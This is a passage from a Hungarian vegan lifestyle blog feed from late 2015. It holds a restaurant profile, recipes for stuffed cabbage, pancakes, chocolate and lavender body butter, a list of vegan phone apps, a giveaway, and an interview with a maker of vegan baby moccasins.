rejtelmeibe. Száznál is több egyszerűen elkészíthető, ínycsiklandó recepttel, és számtalan könnyen megvalósítható ötlettel segíti az egészséges életmód híveit. A lényeg: legyen egyszerű, ízletes, szórakoztató és vegán! Menü Limitált szériás kiadású könyv (1000 db!), amelynek most a második részét ajánlom. Bennfentesektől tudom, hogy elég sok benne a vegetáriánus és vegán recept is, annak ellenére, hogy vannak benne húsos receptek is. A recepteket gyönyörű fotókkal (Glódi Balázs fotós) tették még kívánatosabbá; a grafika Laki Eszter keze munkáját dicséri, a könyvet Mihály Kamilla interjúi teszik teljessé. Az alkotók ezt mondják a könyvről: “Fél éven át voltunk úton, hogy újraélesszük azt, amit az első kötettel is kerestünk: az étellel való kapcsolódás lehetőségét. Amíg az első rész Budapest-centrikus szereplők recept- és történetgyűjteménye, addig a MENÜ 2 egy vidéki, és külföldi kitekintés olyan magyar ismerőseink életére, akik rugalmasan mozognak a világban. A más élet lehetőségeit egy-egy vendégségben kutattuk, és minden recept, amit kézhez kaptunk ennek az esszenciáját őrzi.”
Kozmosz vegán étterem – Budapest
2015. december 15. Vegán lettem
A vegán lettem blog “Hol egyek?” szekciójának első szereplője a Kozmosz vegán étterem. Van egy tündéri kis étterem Budapesten az oktogontól nem messze, melyet egy tüneményes hölgy és a lánya vezet. Semmilyen csicsa, semmilyen sallang, békés atmoszféra, elfogadható árak és az én igényeimnek 100%-osan megfelelő kínálat és ízvilág. Ez a Kozmosz vegán étterem! Ági az étterem vezetője egy kedd estén látott vendégül az étteremben, hogy a megfelelő miliőben beszélgethessünk róluk és az étteremről, melyet 2014 áprilisában nyitottak. Ágiék körülbelül 2012 tavaszán váltak mindenevőből vegánná, átmenet nélkül. A Kozmosz vegán étterem ötlete abból az egyszerű megállapításból eredt, hogy nem tudtak elmenni szinte sehova enni. Nagyon kevés vegán barát étterem volt még akkor. Lányával gyorsan meghozták a döntést: “Éttermet szeretnék nyitni!” – mondta visszaemlékezve. Sok tervezés valamint keresés után megtalálták a megfelelő helyszínt, megkötötték a szerződést és pár hónappal később kinyitottak. Az étterem neve pár órás brainstorming után született meg. “Ez a szó jelenti nekünk az éttermet. Harmonikus, kiegyensúlyozott, békés. És még tudod mi Gyuri? A Káosz ellentéte. Ez a Kozmosz vegán étterem.” – mesélte Ági. A Kozmosz vegán étterem csapata Ahogy azt már említettem Ági és lánya vezeti az éttermet, azonban mit sem érne erőfeszítésük és munkájuk egy csapat nélkül. Náluk alapvető elvárás a vegetáriánus étrend. “Bárki jött hozzánk dolgozni, az egy idő után etikai vegán lett, és megtapasztalta a vegán étrend pozitív hatásait.” – mesélte mosolyogva Ági. Egyébként egészen kis létszámú csapattal dolgoznak annak ellenére, hogy még nem voltam úgy ott, hogy üres lett volna a ház. Házhozszállítással egyelőre nem foglalkoznak, mivel nincsen meg hozzá a humán erőforrás és teljesen biztos pénzügyi struktúra, azonban tervezik bevezetni ezt a szolgáltatást is. Ági egyébként minden nap a Kozmoszban landol mivel nincs olyan nap, hogy ne lenne feladat. Segíti a beosztottak munkáját, beszerző körútra megy, beszélget a vendékkel és beáll a konyhába is. A Kozmosz vegán étterem kínálata A Kozmosz abszolút étterem jellegű hely. Nincs kiszolgálás a pultnál és felszolgálókkal dolgoznak. Azonban étlapjuk változatos és ugyanúgy tartalmaz hagyományos magyar ételeket, mint a gyorséttermekre jellemző “street food”-okat. Emellett nem csak 100%-osan vegán a Kozmosz, de külön figyelmet fordítanak a gluténérzékenyekre, valamint azokra a vegán vendégekre, akik herótot kapnak a szójától. Betűkkel jelölik étlapon a glutén és szójamentes ételeket. A Kozmosz vegán étterem első étlapját még első szakácsuk állította össze. Azóta pár apróbb változás történt, de lényegébe fél éve változatlan repertoárral működik az étterem. Vannak leveseik, főételeik, süteményeik és italok. A fix ételek mellett a leveseknél és a desszerteknél hagytak helyet a kreativitásuknak. Mindkét részben van egy szezonális leves és szezonális desszert menü sor, melyet az adott évszak egyik legjellemzőbb zöldsége vagy gyümölcse határoz meg. Az itallapon található italok 100%-a ugyancsak vegán. Azt csak halkan jegyzem meg, hogy a rakott palacsintájuk ízvilága múzsaként hatott rám és hazafelé kitaláltam egy saját vegán rakott palacsinta receptet. Aki náluk eszik, annak ez kötelező választás! Az adagok nem a megszokott “felét ott hagyjuk” méretűek, azonban nem is számítanak kicsinek az én olvasatomban, márpedig nagy étvágyúnak gondolom magam. Bármikor ettem ott, egy leves-főétel, vagy egy főétel-desszert kombóval tökéletesen megteltem. Hogyan látja a Kozmosz vegán étterem magát? “Célunk a vegán életmód és étrend népszerűsítése, elérhetővé tétele. Szeretnénk bebizonyítani, hogy a vegán ételek nemcsak finomak, egészségesek, de változatosak, laktatóak és megfizethetőek is egyszerre. Az ételek elkészítéséhez nem használunk húst, tejterméket, tojást és mézet, kizárólag növényi alapanyagokból dolgozunk.” – áll a Kozmosz vegán étterem honlapján. Olyanoknak ajánlják éttermüket, akik maguk is etikai vegánok, akik egészségügyi megfontolásból lettek vegánok, akik kipróbálnák a vegán ételeket, valamint azoknak, akik mindezektől függetlenül valami finomságra vágynak. Nyitvatartás: Hétfő: Zárva! Keddtől péntekig: 11:30-15:00 és 18:00-22:00 között nyitva. Szombaton és vasárnap: 11:30 és 22:00 között nyitva. A Kozmosz vegán étterem weboldala és facebook oldala.
Vegán töltött káposzta
2015. december 14. Éltető ételek
Nagyon sok vegán töltött káposzta receptet olvastam a neten, de nekem valahogy egyik sem tetszett. Vagy szejtán volt benne, ami nem más, mint búzahús - tömény glutén -, vagy szója vagy éppen gabona fasírt. Ez utóbbi még talán jó is lett volna, de vidéken azért nem olyan egyszerű beszerezni. Ja... még diós és gombás változatot is találtam, de önmagukban ez sem nyerte el a tetszésemet. Így kénytelen voltam kikísérletezni egy változatot, ami elsőre olyan jól sikerült, hogy azóta már kétszer is elkészítettem. Ennek az ételnek a szíve-borsa maga a fűszerezés. Ezért azt a lehető legjobban találd el, a töltelék bekeverése során kóstolgasd, hogy igazán magyaros legyen az íze. Hozzávalók (4 adag): - 2 evőkanál kókuszolaj - 1 vöröshagyma - 3 gerezd fokhagyma - 15 dkg tisztított gomba - 15 dkg áztatott tarka bab - 15 dkg parbolied rizs (előgőzölt, DM-ben kapható) - 6 dkg nagyszermű zabpehely - 1 teáskanál pirospaprika - 1/2 kávéskanál füstölt pirospaprika - 1 teáskanál házi vegeta, só, bors, chili - kb. 10 db savanyított káposztalevél Paradicsomos öntet: - 1 evőkanál kókuszolaj - 1 kis vöröshagyma - 2 evőkanál kukoricaliszt - 1,5 dl paradicsomlé Elkészítése: A hagymát vágjuk fel apróra, és kókuszolajon dinszteljük meg. Reszeljük bele a fokhagymát is.A zabpelyhet öntsük le forró vízzel (éppen csak ellepje), majd fedjük le és hagyjuk duzzadni. A gombát tisztítsuk meg, és daráljuk morzsásra. Dobjuk rá a hagymára. Pirítsuk úgy 5 percig, majd mehet hozzá a szintén morzsásra darált tarka bab is.Adjuk hozzá a rizst, az áztatott zabpelyhet, és fűszerezzük. Jó magyaros ízvilága legyen, ettől függ a káposzta íze.Minden káposzta levélbe tegyünk 1 jó nagy evőkanálnyi tölteléket. Jól csavarjuk fel úgy, hogy a széleit behajtjuk.Tegyük egy lábasba, és öntsük fel vízzel.Lassú lángon főzzük kb. 1 órát.Az öntethez a felkockázott hagymát dinszteljük meg a kókuszolajon, és reszeljük bele a fokhagymát is. Szórjuk rá a kukoricalisztet, pár keverés után öntsük rá a paradicsomlevet. Főzzük pár percig. Szükség szerint egy kevés vízzel hígíthatjuk.Az elkészült öntetet öntsük a káposztára. Jól rázzuk össze (ne keverjük, mert a töltelék szétnyílik), és úgy 5 perc alatt főzzük össze.
Vegán applikáció lista
2015. december 8. Vegán lettem
Számos hasznos vegán applikáció található angol nyelven. Összegyűjtöttem nektek a legfontosabb és legelterjedtebb vegán életmódot támogatókat. Kifejezetten magyar applikáció még nincs a piacon, így főleg angol nyelvűek közül szemeztem nektek. A felsorolás nem szubjektív, ABC sorrendbe helyeztem az appokat. Próbáljátok ki őket, teszteljétek és írjátok meg kommentben a véleményetek. 21-day vegan kickstart – vegán applikáció Ez az applikáció egy 21 napos vegán induló étkezési útmutató. Napi négy étkezéshez nyújt segítséget receptekkel, képekkel és komplett tápanyagtartalommal a nap minden szakához. Reggeli, ebéd, uzsonna és vacsora kompletten, hogy csak lesned kelljen. Személy szerint nem csak kezdő vegánoknak, hanem olyanoknak is ajánlom, akiknek gondot jelent a megfelelő napi tápanyagmennyiség számolgatása és bevitele. Ára: Ingyenes! Bunny Free – vegán applikáció A Bunny Free segítségével megnézheted, hogy a vásárolni kívánt termék gyártója teszteli-e bármely termékét, vagy termékének összetevőjét állatokon. Telefonoddal leolvasod a vonalkódot és az applikáció megmondja, hogy az adott termék gyártója vegán vagy sem. Emellett lehetőség van rákeresni nagyobb cégekre és megnézni, kompatibilis-e az adott a cég az életviteleddel. Ára: Ingyenes! Cruelty Free – vegán applikáció Ez a bevásárlásoz kifejezetten hasznos alkalmazás 2015 december közepén jelent meg. ABC sorrendbe helyezve lehet kikeresni az adott terméket gyártó márka nevét, ellenőrizvén annak vegán működését. A gyártók mellett tudunk keresni termék típusokat, úgymint dezodor, szappan, sampon, vagy akár kárpit tisztítószer. Ára: Ingyenes! Garden Plate – vegán applikáció A Garden Plate egy kifejezetten receptes applikáció. A tesztelt alkalmazások közül nekem ennek tetszik legjobban a kezelőfelülete, és a vizuális megjelenése is ennek a legkorhűbb. Letisztult és minimalista. Emellett kifejezetten fotócentrikus az alkalmazás, így képek alapján is könnyedén ki tudjuk választani a számunkra legszimpatikusabb aznapi fogást. Röviden összefoglalva rengeteg vegán, gluténmentes és nyers, saláták, egytálételek, rágcsálnivalók és desszertek. Reggelire, tízóraira, ebédre vagy vacsorára. Ára: Ingyenes! Happy Cow – vegetáriánus, vegán applikáció A Happy Cow volt az első olyan alkalmazás, mely a vegetáriánus és főként vegén barát éttermeket gyűjtötte egy csokorba. Mindezt természetesen a felhasználók segítségével. Az applikáció segítséget nyújt a világ minden táján vegetáriánus és vegán éttermeket találni. Az applikáció lehetőséget ad arra, hogy kiválaszd a csak vegán éttermeket például, és hogy értékeld is azokat a helyeket ahol jártál. Külföldi utazás során kifejezetten hasznos lehet, ha van egy ilyen alkalmazás a telefonon. Ára: 3,99$ Is it vegan? – vegán applikáció Ezt a programot egy QR kód olvasóhoz tudnám a legjobban hasonlítani. Be tudod olvasni vele a különböző termékek vonalkódját, majd az alkalmazás megmutatja van-e benne állati eredetű összetevő. Ez tök jól hangzik, de sajnos egy terméket sem ismert fel ami itthon volt a háztartásban. Gondolom Amerikában inkább működik. Azonban nagyon okosak voltak a fejlesztők és beleprogramozták a feltöltés lehetőségét, tehát ha egy olyan terméket olvasol be, melyet nem ismer ez az applikáció, úgy manuálisan megadhatod az összetevők listáját. Jópofa! Ára: Ingyenes! PETA – vegán applikáció A világ egyik legnagyobb állatvédő vegán aktivista szervezetének applikációja. Letöltés után részt vehetsz az aktuális online aktivista akciókban, adományozhatsz a PETA részére. De ami talán a legfontosabb, hogy pontokat gyűjthetsz az állatvédelemmel kapcsolatos tevékenységekkel, és egyre feljebb léphetsz a virtuális állatvédő ranglistán. A tevékenységek szinte napról-napra frissülnek. Ára: Ingyenes! Raw Food Diet Pro – nyers vegán applikáció Ez az applikáció ugyancsak főként recepteket tartalmaz, de kifejezetten nyers vegán megközelítéssel. Több mint 100 recepttel segíti a lúgosító, méregtelenítő, gyümölcs vagy zöldségkúrán gondolkodólat, illetve a nyers vegán étrenden élőket. Emellett számos ponton nyújt segítséget és ad magyarázatot, mint például mi a nyers vegánság, jótékony hatások, veszélyek, vagy hozzávalók témában. Ára: 1,99$ Run cow run – vegán applikáció Egyszer egy szép napon a kis tehén rájön milyen borzalmak történnek a farmon és megszökik. Ezt a kis tehenet kell megmenekíteni a gonosz farmer elől aki traktorral ered a nyomába és próbálja leszurkálni. A játék közben nem csak a kis tehén, hanem egyéb ketrecbe zárt állat életét is megmenthetjük. A játék menete elég bugyuta, de unalmas perceink – ha van ilyen – eltékozlására tökéletesen alkalmas. VeganXpress – vegán applikáció A VeganXpress lényegében egy listázó alkalmazás, melyben különböző típusú vegán ételeket, menü ajánlatokat, vegán söröket, borokat és egyéb alkoholos vegán italokat, valamint a vegán vendégekre is számító éttermeket többek között. Ez az applikáció ugyan nem ingyenes, de szinte mindegyik top10 vegán applikációs listában szerepel. Ára: 1,99$ Az applikációk neveinek mindegyike az adott alkalmazás iTunes oldalára visz tovább. Azt nem ellenőriztem, hogy ezek a programok vannak-e például Androidos mobilokra. Ez részemről nem kirekesztő jelleggel, inkább lustaság miatt alakult így, szóval a nem iPhone és iPad használóktól ezért elnézést kérek! A bejegyzés bővítés alatt áll. Ha van egy kedvenc vegán applikáció a tarsolyodban, vagy szerinted kihagytam valamit, akkor írd meg kommentben és pótlom!
Ehető kencék: Levendulás testápoló vaj + Nyereményjáték
2015. december 5. Zizi kalandjai
Néhány éve már nemcsak arra figyelek oda, hogy mit eszünk, hanem arra is, hogy mivel tápláljuk, ápoljuk a testünket kívülről. Fontosnak tartom a címke olvasást nemcsak az élelmiszerek esetében, hanem a kozmetikumok esetében is (igen, nem értünk minden egyes szót, de erre vannak hatóanyag elemzők, akiktől lehet tanácsot kérni vagy akiknél lehet tájékozódni egyes összetevőkről). Hasonlóan gondolkodó, a natúrkozmetikumokat előnyben részesítő cég megálmodójával és létrehozójával, Hegedűs Eszterrel már korábban beszélgettem itt a blogon. Ugyanazon a főiskolán végeztünk Eszterrel és mint nemrég kiderült ugyanannál a multinál is dolgoztunk, csak nem egyszerre, így mindig elkerültük egymást, de aztán az élet összesodort minket. Eszter hozta létre a Deja-Vu Világot, egy webáruházat, melyben természetes kozmetikumok és ökoháztartási kellékek kaphatóak. “Olyan termékeket válogatok, készítek, amelyek segítenek megtalálni a visszautat a gyökereinkhez, ahhoz a tudáshoz, amit nagyanyáink még tudtak: hogy az egyszerűbb sokszor több. Termékeket, melyeknek használatával mind egészségünket óvjuk, mind pedig környezetünket.“ Kisebb szervező munkát igényelt mire összehoztuk Eszterrel a személyes találkozót és ellátogathattam végre az “alkotó műhelyébe”, a kis boszorkányhonyhájába, amely csodás illatfelhőben úszik. Sok érdekességet elárult a munkájáról, megmutatta az alapanyagokat, amelyeket használ, majd belevetettük magunkat a munkába és készítettünk egy olyan testápoló vajat, amelyet ti is el tudtok készíteni otthon a konyhátokban. Ráadásul olyan alapanyagokat használtunk, amelyeket “meg is ehetünk”, innen az újonnan induló sorozatom neve is: ehető kencék – amelyek kívül-belül ápolnak, élelmiszer minőségű alapanyagokból állnak, házilag gyorsan és egyszerűen előállíthatók. Ehhez a testápoló vajhoz használtunk shea vajat (gazdag tápláló anyagokban, vitaminokban: E, D), jojoba olajat (megelőzi a ráncképződést és gyógyhatású, mivel bőségesen tartalmaz E-vitamint), sárgabarackmag olajat (növényi proteinekben és telítetlen zsírsavakban gazdag, A- vitamintartalma magas, ezen kívül tartalmaz E és B vitamint is) és 100% tisztaságú bio levendula illóolajat. A végeredmény egy finom, krémes testápoló vaj, amely még popsikrémként is használható babáknak! Ha valakinek a bőre nagyon érzékeny és nem bírja az illóolajat, az ki is hagyhatja a levendulát belőle. Felolvasztott shea vaj + olajok összekeverése Levendula illóolaj belecseppentése a készülő testápoló vajba Gyönyörű aranysárga kész testápoló vaj olvasztott állapotban tégelyekbe töltve Kész a levendulás testápoló vaj Levendulás testápoló vaj Hozzávalók (100 ml-hez): – 70 g shea vaj – 7 g jojoba olaj – 7 g sárgabarackmag olaj – 5 ml 100% tisztaságú levendula illóolaj Gyöngyöző (nem lobogó) vízfürdő felett egy hőálló tálban olvasszuk fel a shea vajat. A kis tálka olvasztott shea vajat vegyük le a lábas tetejéről és adjuk hozzá a jojoba és sárgabarackmag olajakat, majd cseppentsük bele a levendula illóolajat. Egy fa spatula segítségével keverjük el és öntsük bele egy kis tégelybe vagy kis üvegbe. Tegyük fagyasztóba kb. 20 percre, hogy megszilárduljon. A Deja-Vu Világ elérhető az alábbi linkeken: – weboldal – blog – Facebook oldal ***** NYEREMÉNYJÁTÉK! Nyeremény : egy nyertes egy díszdobozba csomagolt Deja-Vu szappant fog kapni (a nyertes választhatja ki, hogy melyik két fajtát szeretné a csomagban). Menjetek fel a Deja-Vu oldalára, nézzetek szét náluk és írjátok meg ide a bejegyzés alá kommentben, hogy melyik két szappan tetszik nektek a legjobban! Extra pontokért lehet lájkolni a Deja-Vu Világ és Zizi kalandjai Facebook oldalakat! Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki! Vagyis a lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulába klikkeljetek a szürke I commented! kockára, csak így érvényes a kommentetek. Ha még nem vagy ha már lájkoltátok a Facebook oldalakat, mindkét esetben klikk a kék Visit Us-ra a lájk után. A játék 2015. december 5-től 2015. december 8-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2015. december 9-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt Eszter postázza magyarországi címre. a Rafflecopter giveaway
Házi készítésű csokoládé - vaníliás, narancsos
2015. november 27. Élj harmóniában
Közelednek az év végi ünnepek és az utóbbi idő ben egyre több keksz, sütemény, sós finomság recepte t kezdtem el közreadni Nektek - remélem a receptek segítenek ötletet meríteni az egészséges ünne pi finomságokhoz. Ma gondoltam közreadok egy csokoládé receptet. A csokoládét szerte a világon mindenki ismeri és nagyon sokan kedvelik is - ízléstől függően ki mit... keserű csokoládé , tejcsokoládé, töltött csokoládé , kerek csokoládé, lapos csokoládé, lyukas csokoládé. :) A minap olvastam egy statisztikát, miszerint Magyarországon a lakosság 80%-a nagyon szereti a csokoládét és közel 40%-uk hetente többször fogyaszt csokit. Ez az adat kicsit megdöbbentett, mert nem gondoltam, hogy ilyen mennyiségben esznek emberek csokoládét - persze Magyarország nem az egészséges és tudatos táplálkozásról híres és sajnos élen járunk súlyproblémások, elhízásos megbetegedések arányát tekintve is. Azért is lepett meg az a statisztika, mert hihetetlen, hogy a boltokban ennyi tonna csokoládét tudnak eladni, amikor elég régen köztudott, hogy a boltok polcain kapható csokoládék nem egészségesek. Szerencsére egyre több helyen lehet olvasni arról is, hogy a tiszta minőségű (bio), adalékok, tartósítószerek nélkül készített csokoládé egészséges és magas az antioxidáns tartalma is. Ha szereted a csokoládét akkor a legjobb ha otthon magadnak készíted bio alapanyagokból. Ha pedig vásárolni szeretnél, akkor válassz magas kakaótartalmú bio csokoládét. A csokoládéfogyasztásnál légy mindig mértékletes:) Az otthoni csokoládé készítéshez korábban a blogra már egy cukormentes mandulás csoki receptet kiraktam (itt olvashatod), most egy narancsos bon-bont készítettem. Hozzávalók: - 10 dkg nyers kakaóvaj - 3 ek. nyers kakópor vagy karob por - 2 ek, méz vagy nádporcukor - vanília - szárított narancshéj A kakaóvajat reszeld le vagy vágd nagyon apróra és tedd egy tálba. Forralj vizet egy fazékban és ha felforrt kapcsold le, majd vízgőz felett olvaszd fel a kakaóvajat. Add hozzá a kakaót, az édesítőt , a vaníliát és a narancshéjat, majd és keverd össze. A masszát öntsd bon bon formákba és helyezd a fagyasztóba egy kis időre, majd onnan a rendes hűtőbe rakd át, hogy ott teljesen megszilárduljon. Ha megszilárdult akkor ki tudod már venni a formából. A hozzávalókat - magvak, diófélék, fűszerek, aszalt gyümölcsök, édesítők - kedvedre variálhatod is. Ez egy friss csokoládé és nem tartalmaz semmilyen tartósítószert, ezért nem tudod hosszasan tárolni. Vegyszermentes (bio) alapanyagokat használj!
Reggelire fel! - Sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán)
2015. november 25. Zöld Avocado
sütőtökös amerikai palacsinta fahéjas öntettel (vegán) A palacsinta amerikában főként reggeli fogásként szerepel az otthonokban. Nálunk, magyaroknál inkább főétel egy tartalmas leves után ebédre a családnak, míg az éttermekben desszertként találkozhatunk velük az étlapon. Vannak kultúrák a Világban, ahol pedig inkább vacsorára falják a különböző palacsintákat. Ez röviden azt jelenti, hogy a palacsintát a nap 24 órájában képesek vagyunk megenni! :-) Nagyon sokféle receptet lehet találni a neten palacsinta ügyben. A sütőtökös palacsinta gondolatát sem én találtam fel, de mivel az egyik kedvenc téli tökfélémről van szó, nem maradhatott ki, mint fő palacsinta alapanyag! ;-) Hiszen jó palacsintát bárhol, bármikor, bármekkora mennyiségben képes vagyok megenni... főleg, ha még vegán is! Mert ilyenkor nem csak a szám, de a testem is örül neki! ;-) Olyan receptet szerettem volna, ami a leginkább gyomorbarát, és a legtöbb ember számára fogyasztható. Így egy laktózmentes, tojásmentes és vegán változatot választottam, mely a China Study Cookbook - ban, avagy a Kína tanulmányhoz tartozó szakácskönyvben található recepten alapszik. (A Kína tanulmány elolvasása volt az utolsó löket a vegetáriánussá válásom kalandos útján. Ajánlom mindenki figyelmébe!) Készítettem hozzá egy fahéjas öntetet is, ami tökéletesen kiegészíti ezt a télies hangulatú finomságot. sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) Természetesen gluténmentes liszttel is elkészíthetitek. Legközelebb gesztenyeliszttel fogom kipróbálni ezt a receptet. Hogy miért gesztenyeliszt? Egyrészt mert van itthon, és ritkán használom, pedig sok jó tulajdonsága van. Másrészt, mert valami teltebb liszttel tudom elképzelni ezt a palcsintát, és GM zabliszttel már készítettem egy másik, banán palacsintát korábban a Zöld Avocado vegetáriánus gasztroblogon. Azonban, ha gesztenyeliszttel dolgozunk, igazítsuk hozzá a többi hozzávalót is, mert a gesztenyeliszt nagy nedvszívó képességgel rendelkezik, így az általam megadott folyadékmennyiség gesztenyeliszttel már nem biztos, hogy ugyanazt az eredményt fogja produkálni. sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) HOZZÁVALÓK (kb. 35 db): - 300 g teljeskiőrlésű tönkölybúza liszt - 1 nagy bögre sütőtök püré (párolt sütőtök húsa) - 5 ek maple- vagy agave- vagy datolya szirup - 1/2 tk Himalája só - téli fűszerkeverék: 1/2 kk őrölt szegfűszeg, 1/2 tk őrölt szerecsendió, 1 tk őrölt fahéj - 2 ek őrölt lenmag 6 ek vízben elkeverve (2 db vegán tojásnak felel meg) - 30 ml tetszés szerinti növényi tej (pl.: mogyorótej, mandulatej) - 1/2 tk szódabikarbóna - öntethez: natúr (szója) joghurt + őrölt fahéj + tetszés szerinti édesítőszer - sütéshez: kókuszolaj sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS A sütőtököt meghámozva, lekockázva, puhára pároljuk kb. 25 perc alatt. Majd összenyomjuk villával, vagy turmixgéppel, hogy sütőtök püré legyen belőle. (Meg is süthetjük a tököt sütőben, de nálam ez nem vált be, mert megettem az aranybarnára sütött tököt, mielőtt a palacsintába került volna. Nagyon szeretem. ;-) ) A frissen darált lenmagot elkeverjük a háromszoros mennyiségű vízben, és félretesszük min. 15 percre. Ezidő alatt elkezd kocsonyásodni, és így fogja a tojást helyettesíteni a vegán édességünkben. A száraz és nedves hozzávalókat összekeverjük külön-külön egy-egy keverő tálban. Majd összeborítjuk, és hozzáadjuk a sütőtök pépet. Alaposan összekeverjük, hogy ne maradjanak lisztcsomók benne. Egy palacsintasütőben kevés kókuszolajon, közepes lángon, szépen lassan, kisütögetjük az amerikai palacsinta méretű (kb. a tenyerünk közepe) palacsintákat. Tálalhatjuk például házi lekvárral, maple sziruppal, pekán dió morzsával, banán karikákkal stb. Én fahéjjal és agave sziruppal kikivert natúr szója joghurtot készítettem mellé. Tökéletes őszi/téli reggeli, de akár az iskolai uzsonnás táskába is elfér. Sőt! A munkahelyre is magunkkal vihetjük, mert melegítés nélkül, szobahőmérsékleten is bátran fogyasztható. Finom és tápláló útravaló! :-) sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán) Táplálkozz, ne csak étkezz! Megjegyzés: Azt észrevettétek már, hogy ha a boltban megvásárolt sütőtököt pár napig szobahőmérsékleten tároljátok ( mielőtt felhasználnátok) , akkor édesebb lesz? Próbáljátok ki! sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán)
Tender Toes baba mokaszin nyereményjáték
2015. november 23. Zizi kalandjai
Fotó: Blueberry Baby Erikát az internetnek köszönhetően ismertem meg. Egyből beleszerettem az általa készülő aprócska “cipőcskékbe”, mokaszinokba. Cuki fazonok kislányoknak és kisfiúknak egyaránt, szivárvány színekben, környezet- és állatbarát anyagból. Honnan jött az ötlet, hogy ilyen cuki mokaszinokat kezdjél készíteni? Jó pár éve fedeztem fel magamban, hogy nagyon szeretek kézműveskedni, fabrikálni, alkotni... A sort az esküvőmre magam fűzött ékszer szett kezdte meg, onnantól aztán pedig már nem volt megállás, ehhez jött még a különböző kézzel készült karácsonyfa díszek varrása (ez a kedvenc időszakom), majd az építkezés kapcsán a bútorok felújítása, festése, “öregbítése”, a lakás csinosítása, első gyermekünk szobájának dekorálása, vízfesték képek készítése. Az igazi áttörést aztán a mokaszinok hozták meg, melyből az első párat Zalán keresztfiamnak varrtam még a nyár folyamán. Nézelődtem az interneten, hogy mivel is lephetném meg, és ekkor akadtam rá a Pinteresten egy kis mokaszin képére, a hozzá tartozó leírással együtt. Először egy régi műbőr nadrágot “áldoztam” be, gondolván nem rohanok egyből a méterárú boltba. Elégedett voltam az eredménnyel, noha ennek még minden centijét kézzel varrtam, barátnőmnek is tetszett, így elkezdtem megfelelő anyag után kutatni. Volt-e “előképzettséged” a munkához? A varrást hobbi szinten művelem, nem tanultam soha. A házban a függönyök, a gyerekszobában az ágyszoknyát, rácsvédőt, zászló girlandot mind magam varrtam internetes útmutatók alapján. Habár a családban anyai nagymamám, keresztanyám, apai nagynéném mind “hivatásos” varrónők voltak, apai nagyapám pedig cipészmester, nekem mégsem volt közöm egyik szakmához sem. Eredeti végzettségemet a Vitéz János Római Katolikus Főiskolán szereztem 2004-ben művelődésszervező (andragógia)-kommunikáció szakon, illetve jelenleg végzős hallgatója vagyok a Károli Gáspár Református Egyetem Pszichológiai Intézet, klinikai pszichológia szakának. Ez csak hobbi vagy már kinőtte magát vállalkozássá? Hobbinak indult, majd miután Erik fiúnknak is varrtam egy-egy mokaszint, illetve addigra már Zalán keresztfiam is több puhatalpúval rendelkezett, férjem és barátnőm rákérdeztek – egymástól függetlenül, de szinte egy időben, mintha összebeszéltek volna... – hogy nem lenne-e kedvem eladásra is varrni belőlük, mert biztos másoknak is nagyon tetszene, hiszen ezt eddig csak Amerikában ismerik, itthon egyáltalán nem elterjedt ez a fajta kis puhatalpú. Először ezt a kérést is elhárítottam, mint az összes többi fenti hobbim üzletszerű végzését, de igazából elültették a bogarat a fülemben... Így aztán a nyár folyamán először még nem nyilvánosan, de kitaláltam a márkanevet, létrehoztam egy Facebook rajongói oldalt, vettem anyagokat, utána néztem a számlázási háttérnek, szóval előkészítettem a terepet és gyűjtöttem a bátorságot – ez a lényeg. Milyen anyagból készülnek a kiscipők? Nagyon fontos szerepet tölt be az életemben az állatvédelem, az állatok védelme, melyben tevőlegesen is részt veszek, legyen szó kutyák ideiglenes gazdikhoz szállításáról, kutya út mellől való összeszedéséről, munkahelyemen lévő macskák ivartalanításáról, több szervezet havi rendszeres anyagi támogatásáról, vagy kutyák új családtagként való befogadásáról az otthonunkba (Kaktusz, Mogyoró és Mandula kutyánkat utcáról fogadtuk be, Baldót a fajtamentéstől). Férjem legtöbbször követőm is ebben, ami nagyon sokat jelent, hiszen támogatása nélkül sok alkalommal egymagam egyszerűen kevés lettem volna. Sajnos egyéb lehetőségeim korlátozottak, így az állatok védelmében való felszólalásra jobbára csak internetes felületen van módom (petíciók, tiltakozások). Ebből kifolyólag, morális okokból döntöttem aztán a vegetáriánus lét mellett is, ami számomra nem csak egy étkezési szokás, hanem egy hitvallás, egy életmód, egy élni és élni hagyni életfilozófia. Miért választottad a textilbőrt? Így nem is volt kérdés, hogy a kis mokaszinokat semmiképpen sem fogom valódi bőrből varrni, nem kívánok ilyen módon sem részt venni az állatok kizsákmányolásában, embertelen tartási és elpusztítási módjában. Utána néztem, hogy milyen alternatívák vannak és nagyon könnyen és gyorsan rátaláltam a textilbőrre, ami a műbőr egy speciális változata (PU – polyurethane – fedésű műbőr puha, bőrhöz hasonló fogású, nagy kopásállósággal rendelkező anyag. A különböző kárpitos műbőrök mellett gyakran használnak tisztán PU fedésű műbőröket egészségügyi és cipőipari célokra, ugyanis ezeket a műbőröket egyszerre lehet vízzáróvá és légáteresztővé tenni. Ezt a tulajdonságot szokták “lélegző”-nek is hívni. A hazánkban forgalomban lévő, PU kárpitos műbőrök – népszerű nevén “textilbőrök.”). Bevallom eleinte azért aggódtam a fogadtatását tekintve, hiszen mélyen gyökerezik az emberekben a bőr cipők iránti kötődés, és még néha most is vannak olyanok, akik nem ismerik a textilbőrt , csak azt tudják, hogy nem VALÓDI bőr. De szerencsére azért manapság már olyan jó minőségű mű és textilbőröket gyártanak, hogyha a legtöbben egyelőre még nem is tudatosan, de támogatják az erőszak és szenvedésmentes anyagok használatát. Bízom benne, hogy lassan-lassan, de egyre többen fogják etikai okokból is ezeket a vegán, textilbőröket, vagy egyéb alternatívákat preferálni, illetve hál Istennek egyre elterjedtebb hazánkban is a vegán/vegetáriánus szemlélet, ezeket a közösségek is egyre több tagot számlálnak, így növekszik ennek a tábornak is a létszáma, ezzel pedig egyre eredményesebben tudják hallatni a hangjukat az állatok védelmében, és egyéb lehetőségek megismertetésében. Kiknek ajánlod a mokaszint (pl. kúszó-mászó babáknak, totyogóknak)? Egészen születéstől, 